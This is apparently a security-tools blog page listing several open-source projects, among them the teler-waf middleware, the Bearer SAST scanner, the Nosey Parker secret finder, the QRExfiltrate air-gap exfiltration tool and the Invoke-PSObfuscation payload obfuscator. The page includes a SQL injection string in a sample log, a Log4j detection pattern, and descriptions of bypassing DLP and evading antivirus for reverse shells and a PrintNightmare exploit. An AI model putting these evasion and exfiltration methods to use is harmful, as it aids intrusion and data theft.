We welcome collaborators! Please see the OWASP Domain Protect website for more details.

Documentation

Manual scans - AWS
Manual scans - CloudFlare
Architecture
Database
Reports
Automated takeover optional feature
Cloudflare optional feature
Bugcrowd optional feature
HackerOne optional feature
Vulnerability types
Vulnerable A records (IP addresses) optional feature
Requirements
Installation
Slack Webhooks
AWS IAM policies
CI/CD
Development
Code Standards
Automated Tests
Manual Tests
Conference Talks and Blog Posts

Limitations

This tool cannot guarantee 100% protection against subdomain takeovers.



Teler-Waf - A Go HTTP Middleware That Provides Teler IDS Functionality To Protect Against Web-Based Attacks And Improve The Security Of Go-based Web Applications

By: Zion3R

teler-waf is a comprehensive security solution for Go-based web applications. It acts as an HTTP middleware, providing an easy-to-use interface for integrating IDS functionality with teler IDS into existing Go applications. By using teler-waf, you can help protect against a variety of web-based attacks, such as cross-site scripting (XSS) and SQL injection.

The package comes with a standard net/http.Handler, making it easy to integrate into your application's routing. When a client makes a request to a route protected by teler-waf, the request is first checked against the teler IDS to detect known malicious patterns. If no malicious patterns are detected, the request is then passed through for further processing.

In addition to providing protection against web-based attacks, teler-waf can also help improve the overall security and integrity of your application. It is highly configurable, allowing you to tailor it to fit the specific needs of your application.


See also:

  • kitabisa/teler: Real-time HTTP intrusion detection.
  • dwisiswant0/cox: Cox is bluemonday-wrapper to perform a deep-clean and/or sanitization of (nested-)interfaces from HTML to prevent XSS payloads.

Features

Some core features of teler-waf include:

  • HTTP middleware for Go web applications.
  • Integration of teler IDS functionality.
  • Detection of known malicious patterns using the teler IDS.
    • Common web attacks, such as cross-site scripting (XSS) and SQL injection, etc.
    • CVEs, covers known vulnerabilities and exploits.
    • Bad IP addresses, such as those associated with known malicious actors or botnets.
    • Bad HTTP referers, such as those that are not expected based on the application's URL structure or are known to be associated with malicious actors.
    • Bad crawlers, covers requests from known bad crawlers or scrapers, such as those that are known to cause performance issues or attempt to extract sensitive information from the application.
    • Directory bruteforce attacks, such as by trying common directory names or using dictionary attacks.
  • Configuration options to whitelist specific types of requests based on their URL or headers.
  • Easy integration with many frameworks.
  • High configurability to fit the specific needs of your application.

Overall, teler-waf provides a comprehensive security solution for Go-based web applications, helping to protect against web-based attacks and improve the overall security and integrity of your application.

Install

To install teler-waf in your Go application, run the following command to download and install the teler-waf package:

go get github.com/kitabisa/teler-waf

Usage

Here is an example of how to use teler-waf in a Go application:

  1. Import the teler-waf package in your Go code:
import "github.com/kitabisa/teler-waf"
  1. Use the New function to create a new instance of the Teler type. This function takes a variety of optional parameters that can be used to configure teler-waf to suit the specific needs of your application.
waf := teler.New()
  1. Use the Handler method of the Teler instance to create a net/http.Handler. This handler can then be used in your application's HTTP routing to apply teler-waf's security measures to specific routes.
handler := waf.Handler(http.HandlerFunc(yourHandlerFunc))
  1. Use the handler in your application's HTTP routing to apply teler-waf's security measures to specific routes.
http.Handle("/path", handler)

That's it! You have configured teler-waf in your Go application.

Options:

For a list of the options available to customize teler-waf, see the teler.Options struct.

Examples

Here is an example of how to customize the options and rules for teler-waf:

// main.go
package main

import (
"net/http"

"github.com/kitabisa/teler-waf"
"github.com/kitabisa/teler-waf/request"
"github.com/kitabisa/teler-waf/threat"
)

var myHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// This is the handler function for the route that we want to protect
// with teler-waf's security measures.
w.Write([]byte("hello world"))
})

var rejectHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// This is the handler function for the route that we want to be rejected
// if the teler-waf's security measures are triggered.
http.Error(w, "Sorry, your request has been denied for security reasons.", http.StatusForbidden)
})

func main() {
// Create a new instance of the Teler type using the New function
// and configure it using the Options struct.
telerMiddleware := teler.New(tel er.Options{
// Exclude specific threats from being checked by the teler-waf.
Excludes: []threat.Threat{
threat.BadReferrer,
threat.BadCrawler,
},
// Specify whitelisted URIs (path & query parameters), headers,
// or IP addresses that will always be allowed by the teler-waf.
Whitelists: []string{
`(curl|Go-http-client|okhttp)/*`,
`^/wp-login\.php`,
`(?i)Referer: https?:\/\/www\.facebook\.com`,
`192\.168\.0\.1`,
},
// Specify custom rules for the teler-waf to follow.
Customs: []teler.Rule{
{
// Give the rule a name for easy identification.
Name: "Log4j Attack",
// Specify the logical operator to use when evaluating the rule's conditions.
Condition: "or",
// Specify the conditions that must be met for the rule to trigger.
Rules: []teler.Condition{
{
// Specify the HTTP method that the rule applies to.
Method: request.GET,
// Specify the element of the request that the rule applies to
// (e.g. URI, headers, body).
Element: request.URI,
// Specify the pattern to match against the element of the request.
Pattern: `\$\{.*:\/\/.*\/?\w+?\}`,
},
},
},
},
// Specify the file path to use for logging.
LogFile: "/tmp/teler.log",
})

// Set the rejectHandler as the handler for the telerMiddleware.
telerMiddleware.SetHandler(rejectHandler)

// Create a new handler using the handler method of the Teler instance
// and pass in the myHandler function for the route we want to protect.
app := telerMiddleware.Handler(myHandler)

// Use the app handler as the handler for the route.
http.ListenAndServe("127.0.0.1:3000", app)
}

Warning: When using a whitelist, any request that matches it - regardless of the type of threat it poses, it will be returned without further analysis.

To illustrate, suppose you set up a whitelist to permit requests containing a certain string. In the event that a request contains that string, but /also/ includes a payload such as an SQL injection or cross-site scripting ("XSS") attack, the request may not be thoroughly analyzed for common web attack threats and will be swiftly returned. See issue #25.

For more examples of how to use teler-waf or integrate it with any framework, take a look at examples/ directory.

Development

By default, teler-waf caches all incoming requests for 15 minutes & clear them every 20 minutes to improve the performance. However, if you're still customizing the settings to match the requirements of your application, you can disable caching during development by setting the development mode option to true. This will prevent incoming requests from being cached and can be helpful for debugging purposes.

// Create a new instance of the Teler type using
// the New function & enable development mode option.
telerMiddleware := teler.New(teler.Options{
Development: true,
})

Logs

Here is an example of what the log lines would look like if teler-waf detects a threat on a request:

{"level":"warn","ts":1672261174.5995026,"msg":"bad crawler","id":"654b85325e1b2911258a","category":"BadCrawler","request":{"method":"GET","path":"/","ip_addr":"127.0.0.1:37702","headers":{"Accept":["*/*"],"User-Agent":["curl/7.81.0"]},"body":""}}
{"level":"warn","ts":1672261175.9567692,"msg":"directory bruteforce","id":"b29546945276ed6b1fba","category":"DirectoryBruteforce","request":{"method":"GET","path":"/.git","ip_addr":"127.0.0.1:37716","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}
{"level":"warn","ts":1672261177.1487508,"msg":"Detects common comment types","id":"75412f2cc0ec1cf79efd","category":"CommonWebAttack","request":{"method":"GET","path":"/?id=1%27% 20or%201%3D1%23","ip_addr":"127.0.0.1:37728","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}

The id is a unique identifier that is generated when a request is rejected by teler-waf. It is included in the HTTP response headers of the request (X-Teler-Req-Id), and can be used to troubleshoot issues with requests that are being made to the website.

For example, if a request to a website returns an HTTP error status code, such as a 403 Forbidden, the teler request ID can be used to identify the specific request that caused the error and help troubleshoot the issue.

Teler request IDs are used by teler-waf to track requests made to its web application and can be useful for debugging and analyzing traffic patterns on a website.

Datasets

The teler-waf package utilizes a dataset of threats to identify and analyze each incoming request for potential security threats. This dataset is updated daily, which means that you will always have the latest resource. The dataset is initially stored in the user-level cache directory (on Unix systems, it returns $XDG_CACHE_HOME/teler-waf as specified by XDG Base Directory Specification if non-empty, else $HOME/.cache/teler-waf. On Darwin, it returns $HOME/Library/Caches/teler-waf. On Windows, it returns %LocalAppData%/teler-waf. On Plan 9, it returns $home/lib/cache/teler-waf) on your first launch. Subsequent launch will utilize the cached dataset, rather than downloading it again.

Note: The threat datasets are obtained from the kitabisa/teler-resources repository.

However, there may be situations where you want to disable automatic updates to the threat dataset. For example, you may have a slow or limited internet connection, or you may be using a machine with restricted file access. In these cases, you can set an option called NoUpdateCheck to true, which will prevent the teler-waf from automatically updating the dataset.

// Create a new instance of the Teler type using the New
// function & disable automatic updates to the threat dataset.
telerMiddleware := teler.New(teler.Options{
NoUpdateCheck: true,
})

Finally, there may be cases where it's necessary to load the threat dataset into memory rather than saving it to a user-level cache directory. This can be particularly useful if you're running the application or service on a distroless or runtime image, where file access may be limited or slow. In this scenario, you can set an option called InMemory to true, which will load the threat dataset into memory for faster access.

// Create a new instance of the Teler type using the
// New function & enable in-memory threat datasets store.
telerMiddleware := teler.New(teler.Options{
InMemory: true,
})

Warning: This may also consume more system resources, so it's worth considering the trade-offs before making this decision.

Resources

Security

If you discover a security issue, please bring it to their attention right away, we take security seriously!

Reporting a Vulnerability

If you have information about a security issue, or vulnerability in this teler-waf package, and/or you are able to successfully execute such as cross-site scripting (XSS) and pop-up an alert in our demo site (see resources), please do NOT file a public issue — instead, kindly send your report privately via the vulnerability report form or to our official channels as per our security policy.

Limitations

Here are some limitations of using teler-waf:

  • Performance overhead: teler-waf may introduce some performance overhead, as the teler-waf will need to process each incoming request. If you have a high volume of traffic, this can potentially slow down the overall performance of your application significantly, especially if you enable the CVEs threat detection. See benchmark below:
$ go test -bench . -cpu=4
goos: linux
goarch: amd64
pkg: github.com/kitabisa/teler-waf
cpu: 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz
BenchmarkTelerDefaultOptions-4 42649 24923 ns/op 6206 B/op 97 allocs/op
BenchmarkTelerCommonWebAttackOnly-4 48589 23069 ns/op 5560 B/op 89 allocs/op
BenchmarkTelerCVEOnly-4 48103 23909 ns/op 5587 B/op 90 allocs/op
BenchmarkTelerBadIPAddressOnly-4 47871 22846 ns/op 5470 B/op 87 allocs/op
BenchmarkTelerBadReferrerOnly-4 47558 23917 ns/op 5649 B/op 89 allocs/op
BenchmarkTelerBadCrawlerOnly-4 42138 24010 ns/op 5694 B/op 86 allocs/op
BenchmarkTelerDirectoryBruteforceOnly-4 45274 23523 ns/op 5657 B/op 86 allocs/op
BenchmarkT elerCustomRule-4 48193 22821 ns/op 5434 B/op 86 allocs/op
BenchmarkTelerWithoutCommonWebAttack-4 44524 24822 ns/op 6054 B/op 94 allocs/op
BenchmarkTelerWithoutCVE-4 46023 25732 ns/op 6018 B/op 93 allocs/op
BenchmarkTelerWithoutBadIPAddress-4 39205 25927 ns/op 6220 B/op 96 allocs/op
BenchmarkTelerWithoutBadReferrer-4 45228 24806 ns/op 5967 B/op 94 allocs/op
BenchmarkTelerWithoutBadCrawler-4 45806 26114 ns/op 5980 B/op 97 allocs/op
BenchmarkTelerWithoutDirectoryBruteforce-4 44432 25636 ns/op 6185 B/op 97 allocs/op
PASS
ok github.com/kitabisa/teler-waf 25.759s

Note: Benchmarking results may vary and may not be consistent. Those results were obtained when there were >1.5k CVE templates and the teler-resources dataset may have increased since then, which may impact the results.

  • Configuration complexity: Configuring teler-waf to suit the specific needs of your application can be complex, and may require a certain level of expertise in web security. This can make it difficult for those who are not familiar with application firewalls and IDS systems to properly set up and use teler-waf.
  • Limited protection: teler-waf is not a perfect security solution, and it may not be able to protect against all possible types of attacks. As with any security system, it is important to regularly monitor and maintain teler-waf to ensure that it is providing the desired level of protection.

Known Issues

To view a list of known issues with teler-waf, please filter the issues by the "known-issue" label.

License

This program is developed and maintained by members of Kitabisa Security Team, and this is not an officially supported Kitabisa product. This program is free software: you can redistribute it and/or modify it under the terms of the Apache license. Kitabisa teler-waf and any contributions are copyright © by Dwi Siswanto 2022-2023.



Bearer - Code Security Scanning Tool (SAST) That Discover, Filter And Prioritize Security Risks And Vulnerabilities Leading To Sensitive Data Exposures (PII, PHI, PD)


Discover, filter, and prioritize security risks and vulnerabilities impacting your code.

Bearer is a static application security testing (SAST) tool that scans your source code and analyzes your data flows to discover, filter and prioritize security risks and vulnerabilities leading to sensitive data exposures (PII, PHI, PD).

Currently supporting JavaScript and Ruby stacks.

Code security scanner that natively filters and prioritizes security risks using sensitive data flow analysis.

Bearer provides built-in rules against a common set of security risks and vulnerabilities, known as OWASP Top 10. Here are some practical examples of what those rules look for:

  • Non-filtered user input.
  • Leakage of sensitive data through cookies, internal loggers, third-party logging services, and into analytics environments.
  • Usage of weak encryption libraries or misusage of encryption algorithms.
  • Unencrypted incoming and outgoing communication (HTTP, FTP, SMTP) of sensitive information.
  • Hard-coded secrets and tokens.

And many more.

Bearer is Open Source (see license) and fully customizable, from creating your own rules to component detection (database, API) and data classification.

Bearer also powers our commercial offering, Bearer Cloud, allowing security teams to scale and monitor their application security program using the same engine.

Getting started

Discover your most critical security risks and vulnerabilities in only a few minutes. In this guide, you will install Bearer, run a scan on a local project, and view the results. Let's get started!

Install Bearer

The quickest way to install Bearer is with the install script. It will auto-select the best build for your architecture. Defaults installation to ./bin and to the latest release version:

curl -sfL https://raw.githubusercontent.com/Bearer/bearer/main/contrib/install.sh | sh

Other install options


Homebrew

Using Bearer's official Homebrew tap:

brew install bearer/tap/bearer

Debian/Ubuntu
$ sudo apt-get install apt-transport-https
$ echo "deb [trusted=yes] https://apt.fury.io/bearer/ /" | sudo tee -a /etc/apt/sources.list.d/fury.list
$ sudo apt-get update
$ sudo apt-get install bearer

RHEL/CentOS

Add repository setting:

$ sudo vim /etc/yum.repos.d/fury.repo
[fury]
name=Gemfury Private Repo
baseurl=https://yum.fury.io/bearer/
enabled=1
gpgcheck=0

Then install with yum:

  $ sudo yum -y update
$ sudo yum -y install bearer

Docker

Bearer is also available as a Docker image on Docker Hub and ghcr.io.

With docker installed, you can run the following command with the appropriate paths in place of the examples.

docker run --rm -v /path/to/repo:/tmp/scan bearer/bearer:latest-amd64 scan /tmp/scan

Additionally, you can use docker compose. Add the following to your docker-compose.yml file and replace the volumes with the appropriate paths for your project:

version: "3"
services:
bearer:
platform: linux/amd64
image: bearer/bearer:latest-amd64
volumes:
- /path/to/repo:/tmp/scan

Then, run the docker compose run command to run Bearer with any specified flags:

docker compose run bearer scan /tmp/scan --debug

Binary

Download the archive file for your operating system/architecture from here.

Unpack the archive, and put the binary somewhere in your $PATH (on UNIX-y systems, /usr/local/bin or the like). Make sure it has permission to execute.


Scan your project

The easiest way to try out Bearer is with our example project, Bear Publishing. It simulates a realistic Ruby application with common security flaws. Clone or download it to a convenient location to get started.

git clone https://github.com/Bearer/bear-publishing.git

Now, run the scan command with bearer scan on the project directory:

bearer scan bear-publishing

A progress bar will display the status of the scan.

Once the scan is complete, Bearer will output a security report with details of any rule failures, as well as where in the codebase the infractions happened and why.

By default the scan command use the SAST scanner, other scanner types are available.

Analyze the report

The security report is an easily digestible view of the security issues detected by Bearer. A report is made up of:

  • The list of rules run against your code.
  • Each detected failure, containing the file location and lines that triggered the rule failure.
  • A stat section with a summary of rules checks, failures and warnings.

The Bear Publishing example application will trigger rule failures and output a full report. Here's a section of the output:

...
CRITICAL: Only communicate using SFTP connections.
https://docs.bearer.com/reference/rules/ruby_lang_insecure_ftp

File: bear-publishing/app/services/marketing_export.rb:34

34 Net::FTP.open(
35 'marketing.example.com',
36 'marketing',
37 'password123'
...
41 end


=====================================

56 checks, 10 failures, 6 warnings

CRITICAL: 7
HIGH: 0
MEDIUM: 0
LOW: 3
WARNING: 6

The security report is just one report type available in Bearer.

Additional options for using and configuring the scan command can be found in the scan documentation.

For additional guides and usage tips, view the docs.

FAQs

How do you detect sensitive data flows from the code?

When you run Bearer on your codebase, it discovers and classifies data by identifying patterns in the source code. Specifically, it looks for data types and matches against them. Most importantly, it never views the actual values (it just can’t)—but only the code itself.

Bearer assesses 120+ data types from sensitive data categories such as Personal Data (PD), Sensitive PD, Personally identifiable information (PII), and Personal Health Information (PHI). You can view the full list in the supported data types documentation.

In a nutshell, our static code analysis is performed on two levels: Analyzing class names, methods, functions, variables, properties, and attributes. It then ties those together to detected data structures. It does variable reconciliation etc. Analyzing data structure definitions files such as OpenAPI, SQL, GraphQL, and Protobuf.

Bearer then passes this over to the classification engine we built to support this very particular discovery process.

If you want to learn more, here is the longer explanation.

When and where to use Bearer?

We recommend running Bearer in your CI to check new PR automatically for security issues, so your development team has a direct feedback loop to fix issues immediately.

You can also integrate Bearer in your CD, though we recommend to only make it fail on high criticality issues only, as the impact for your organization might be important.

In addition, running Bearer on a scheduled job is a great way to keep track of your security posture and make sure new security issues are found even in projects with low activity.

Supported Language

Bearer currently supports JavaScript and Ruby and their associated most used frameworks and libraries. More languages will follow.

What makes Bearer different from any other SAST tools?

SAST tools are known to bury security teams and developers under hundreds of issues with little context and no sense of priority, often requiring security analysts to triage issues. Not Bearer.

The most vulnerable asset today is sensitive data, so we start there and prioritize application security risks and vulnerabilities by assessing sensitive data flows in your code to highlight what is urgent, and what is not.

We believe that by linking security issues with a clear business impact and risk of a data breach, or data leak, we can build better and more robust software, at no extra cost.

In addition, by being Open Source, extendable by design, and built with a great developer UX in mind, we bet you will see the difference for yourself.

How long does it take to scan my code? Is it fast?

It depends on the size of your applications. It can take as little as 20 seconds, up to a few minutes for an extremely large code base. We’ve added an internal caching layer that only looks at delta changes to allow quick, subsequent scans.

Running Bearer should not take more time than running your test suite.

What about false positives?

If you’re familiar with other SAST tools, false positives are always a possibility.

By using the most modern static code analysis techniques and providing a native filtering and prioritizing solution on the most important issues, we believe this problem won’t be a concern when using Bearer.

Get in touch

Thanks for using Bearer. Still have questions?

Contributing

Interested in contributing? We're here for it! For details on how to contribute, setting up your development environment, and our processes, review the contribution guide.

Code of conduct

Everyone interacting with this project is expected to follow the guidelines of our code of conduct.

Security

To report a vulnerability or suspected vulnerability, see our security policy. For any questions, concerns or other security matters, feel free to open an issue or join the Discord Community.



Certwatcher - Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.


Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing, exposed tokens, secret api key patterns using regular expressions defined by YAML templates.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors



Noseyparker - A Command-Line Program That Finds Secrets And Sensitive Information In Textual Data And Git History


Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data. It is useful both for offensive and defensive security testing.

Key features:

  • It supports scanning files, directories, and the entire history of Git repositories
  • It uses regular expression matching with a set of 95 patterns chosen for high signal-to-noise based on experience and feedback from offensive security engagements
  • It groups matches together that share the same secret, further emphasizing signal over noise
  • It is fast: it can scan at hundreds of megabytes per second on a single core, and is able to scan 100GB of Linux kernel source history in less than 2 minutes on an older MacBook Pro

This open-source version of Nosey Parker is a reimplementation of the internal version that is regularly used in offensive security engagements at Praetorian. The internal version has additional capabilities for false positive suppression and an alternative machine learning-based detection engine. Read more in blog posts here and here.


Building from source

1. (On x86_64) Install the Hyperscan library and headers for your system

On macOS using Homebrew:

brew install hyperscan pkg-config

On Ubuntu 22.04:

apt install libhyperscan-dev pkg-config

1. (On non-x86_64) Build Vectorscan from source

You will need several dependencies, including cmake, boost, ragel, and pkg-config.

Download and extract the source for the 5.4.8 release of Vectorscan:

wget https://github.com/VectorCamp/vectorscan/archive/refs/tags/vectorscan/5.4.8.tar.gz && tar xfz 5.4.8.tar.gz

Build with cmake:

cd vectorscan-vectorscan-5.4.8 && cmake -B build -DCMAKE_BUILD_TYPE=Release . && cmake --build build

Set the HYPERSCAN_ROOT environment variable so that Nosey Parker builds against your from-source build of Vectorscan:

export HYPERSCAN_ROOT="$PWD/build"

Note: The Nosey Parker Dockerfile builds Vectorscan from source and links against that.

2. Install the Rust toolchain

Recommended approach: install from https://rustup.rs

3. Build using Cargo

cargo build --release

This will produce a binary at target/release/noseyparker.

Docker Usage

A prebuilt Docker image is available for the latest release for x86_64:

docker pull ghcr.io/praetorian-inc/noseyparker:latest

A prebuilt Docker image is available for the most recent commit for x86_64:

docker pull ghcr.io/praetorian-inc/noseyparker:edge

For other architectures (e.g., ARM) you will need to build the Docker image yourself:

docker build -t noseyparker .

Run the Docker image with a mounted volume:

docker run -v "$PWD":/opt/ noseyparker

Note: The Docker image runs noticeably slower than a native binary, particularly on macOS.

Usage quick start

The datastore

Most Nosey Parker commands use a datastore. This is a special directory that Nosey Parker uses to record its findings and maintain its internal state. A datastore will be implicitly created by the scan command if needed. You can also create a datastore explicitly using the datastore init -d PATH command.

Scanning filesystem content for secrets

Nosey Parker has built-in support for scanning files, recursively scanning directories, and scanning the entire history of Git repositories.

For example, if you have a Git clone of CPython locally at cpython.git, you can scan its entire history with the scan command. Nosey Parker will create a new datastore at np.cpython and saves its findings there.

$ noseyparker scan --datastore np.cpython cpython.git
Found 28.30 GiB from 18 plain files and 427,712 blobs from 1 Git repos [00:00:04]
Scanning content ████████████████████ 100% 28.30 GiB/28.30 GiB [00:00:53]
Scanned 28.30 GiB from 427,730 blobs in 54 seconds (538.46 MiB/s); 4,904/4,904 new matches

Rule Distinct Groups Total Matches
───────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,1 92
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2

Run the `report` command next to show finding details.

Scanning Git repos by URL, GitHub username, or GitHub organization name

Nosey Parker can also scan Git repos that have not already been cloned to the local filesystem. The --git-url URL, --github-user NAME, and --github-org NAME options to scan allow you to specify repositories of interest.

For example, to scan the Nosey Parker repo itself:

$ noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker

For example, to scan accessible repositories belonging to octocat:

$ noseyparker scan --datastore np.noseyparker --github-user octocat

These input specifiers will use an optional GitHub token if available in the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

See noseyparker help scan for more details.

Summarizing findings

Nosey Parker prints out a summary of its findings when it finishes scanning. You can also run this step separately:

$ noseyparker summarize --datastore np.cpython

Rule Distinct Groups Total Matches
───────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2

Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

Reporting detailed findings

To see details of Nosey Parker's findings, use the report command. This prints out a text-based report designed for human consumption:

(Note: the findings above are synthetic, invalid secrets.) Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

Enumerating repositories from GitHub

To list URLs for repositories belonging to GitHub users or organizations, use the github repos list command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:

$ noseyparker github repos list --user octocat
https://github.com/octocat/Hello-World.git
https://github.com/octocat/Spoon-Knife.git
https://github.com/octocat/boysenberry-repo-1.git
https://github.com/octocat/git-consortium.git
https://github.com/octocat/hello-worId.git
https://github.com/octocat/linguist.git
https://github.com/octocat/octocat.github.io.git
https://github.com/octocat/test-repo1.git

An optional GitHub Personal Access Token can be provided via the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

See noseyparker help github for more details.

Getting help

Running the noseyparker binary without arguments prints top-level help and exits. You can get abbreviated help for a particular command by running noseyparker COMMAND -h.

Tip: More detailed help is available with the help command or long-form --help option.

Contributing

Contributions are welcome, particularly new regex rules. Developing new regex rules is detailed in a separate document.

If you are considering making significant code changes, please open an issue first to start discussion.

License

Nosey Parker is licensed under the Apache License, Version 2.0.

Any contribution intentionally submitted for inclusion in Nosey Parker by you, as defined in the Apache 2.0 license, shall be licensed as above, without any additional terms or conditions.



QRExfiltrate - Tool That Allows You To Convert Any Binary File Into A QRcode Movie. The Data Can Then Be Reassembled Visually Allowing Exfiltration Of Data In Air Gapped Systems


This tool is a command line utility that allows you to convert any binary file into a QRcode GIF. The data can then be reassembled visually allowing exfiltration of data in air gapped systems. It was designed as a proof of concept to demonstrate weaknesses in DLP software; that is, the assumption that data will leave the system via email, USB sticks or other media.

The tool works by taking a binary file and converting it into a series of QR codes images. These images are then combined into a GIF file that can be easily reassembled using any standard QR code reader. This allows data to be exfiltrated without detection from most DLP systems.


How to Use

To use QRExfiltrate, open a command line and navigate to the directory containing the QRExfiltrate scripts.

Once you have done this, you can run the following command to convert your binary file into a QRcode GIF:

./encode.sh ./draft-taddei-ech4ent-introduction-00.txt output.gif

Demo

encode.sh <inputfile>

Where <inputfile> is the path to the binary file you wish to convert, and <outputfile>, if no output is specified output.gif used is the path to the desired output GIF file.

Once the command completes, you will have a GIF file containing the data from your binary file.

You can then transfer this GIF file as you wish and reassemble the data using any standard QR code reader.

Prerequisites

QRExfiltrate requires the following prerequisites:

  • qrencode
  • ffmpeg

Limitations

QRExfiltrate is limited by the size of the source data, qrencoding per frame has been capped to 64 bytes to ensure the resulting image has a uniform size and shape. Additionally the conversion to QR code results in a lot of storage overhead, on average the resulting gif is 50x larger than the original. Finally, QRExfiltrate is limited by the capabilities of the QR code reader. If the reader is not able to detect the QR codes from the GIF, the data will not be able to be reassembled.

The decoder script has been intentionally omitted

Conclusion

QRExfiltrate is a powerful tool that can be used to bypass DLP systems and exfiltrate data in air gapped networks. However, it is important to note that QRExfiltrate should be used with caution and only in situations where the risk of detection is low.



Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You'Re On Windows Or Kali Linux


Traditional obfuscation techniques tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but they have become trivial to extract the intended payload and some launchers get detected often, which essentially introduces chokepoints.

The approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.

While this script can obfuscate most payloads successfully on it's own, this project will also serve as a standing framework that I will to use to produce future functions that will utilize this framework to provide dedicated obfuscated payloads, such as one that only produces reverse shells.

I wrote a blog piece for Offensive Security as a precursor into the techniques this tool introduces. Before venturing further, consider giving it a read first: https://www.offensive-security.com/offsec/powershell-obfuscation/


Dedicated Payloads

As part of my on going work with PowerShell obfuscation, I am building out scripts that produce dedicated payloads that utilize this framework. These have helped to save me time and hope you find them useful as well. You can find them within their own folders at the root of this repository.

  1. Get-ReverseShell
  2. Get-DownloadCradle
  3. Get-Shellcode

Components

Like many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent individual components within a payload to a form an obscure or unintelligible derivative.

Keep in mind that targeting every component in complex payloads is very instrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as print nightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named paramters.

Component types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.

Supported Types

  • Aliases (iex)
  • Cmdlets (New-Object)
  • Comments (# and <# #>)
  • Integers (4444)
  • Methods ($client.GetStream())
  • Namespace Classes (System.Net.Sockets.TCPClient)
  • Pipes (|)
  • Pipeline Variables ($_)
  • Strings ("value" | 'value')
  • Variables ($client)

Generators

Each component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, then it will iterative each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload so each iteration will be different. The only exception to this is variable names.

If an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.

$Picker = 1..6 | Get-Random
Switch ($Picker) {
1 { $NewValue = 'Stay' }
2 { $NewValue = 'Off' }
3 { $NewValue = 'Ronins' }
4 { $NewValue = 'Lawn' }
5 { $NewValue = 'And' }
6 { $NewValue = 'Rocks' }
}

Requirements

This framework and resulting payloads have been tested on the following operating system and PowerShell versions. The resulting reverse shells will not work on PowerShell v2.0

PS Version OS Tested Invoke-PSObfucation.ps1 Reverse Shell
7.1.3 Kali 2021.2 Supported Supported
5.1.19041.1023 Windows 10 10.0.19042 Supported Supported
5.1.21996.1 Windows 11 10.0.21996 Supported Supported

Usage Examples

CVE-2021-34527 (PrintNightmare)

┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating namespace classes
[*] Obfuscating cmdlets
[*] Obfuscating variables
[-] -DriverName is now -QhYm48JbCsqF
[-] -NewUser is now -ybrcKe
[-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth
[-] -DLL is now -dNr
[-] -ModuleName is now -jd
[-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o
[-] -Type is now -fjTOTLDCGufqEu
[-] -FullName is now -0vEKnCqm
[-] -EnumElements is now -B9aFqfvDbjtOXPxrR< br/>[-] -Bitfield is now -bFUCG7LB9gq50p4e
[-] -StructFields is now -xKryDRQnLdjTC8
[-] -PackingSize is now -0CB3X
[-] -ExplicitLayout is now -YegeaeLpPnB
[*] Removing comments
[*] Writing payload to o-printnightmare.ps1
[*] Done

PS /home/tristram>

PowerShell Reverse Shell

